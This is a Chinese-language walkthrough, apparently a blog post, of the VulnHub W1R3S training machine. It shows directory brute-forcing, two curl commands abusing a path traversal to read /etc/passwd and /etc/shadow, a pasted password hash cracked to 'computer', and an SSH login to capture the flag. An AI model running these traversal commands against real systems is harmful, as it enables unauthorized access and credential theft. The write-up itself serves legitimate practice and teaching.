2021年1月2日-VulnHub-W1R3S 渗透学习

VulnHub-W1R3S 渗透学习

靶机下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

kali地址:192.168.31.77

靶机IP地址:192.168.31.11

一、信息收集

2021年1月2日-VulnHub-W1R3S 渗透学习_第1张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第2张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第3张图片

使用dirb 爆破目录

2021年1月2日-VulnHub-W1R3S 渗透学习_第4张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第5张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第6张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第7张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第8张图片

curl是一个命令行工具,可用于在网络上传输数据。

它支持许多现成的协议,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。

在调试网络请求时,curl是您可以找到的最佳工具之一。

curl使用 教程 https://flaviocopes.com/http-curl/

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php

2021年1月2日-VulnHub-W1R3S 渗透学习_第9张图片

2021年1月2日-VulnHub-W1R3S 渗透学习_第10张图片

然后我再次执行以下命令,使用相同的过程获取密码文件。

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php

2021年1月2日-VulnHub-W1R3S 渗透学习_第11张图片

将 w1r3s: 6 6 6xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

复制到一个 pass.txt 文本文件中

2021年1月2日-VulnHub-W1R3S 渗透学习_第12张图片

得到w1r3s 的密码computer

使用 ssh登录

2021年1月2日-VulnHub-W1R3S 渗透学习_第13张图片

获得flag.txt

2021年1月2日-VulnHub-W1R3S 渗透学习_第14张图片

获得flag.txt

这个靶机还是比较简单的

你可能感兴趣的:(安全,kali,linux,经验分享)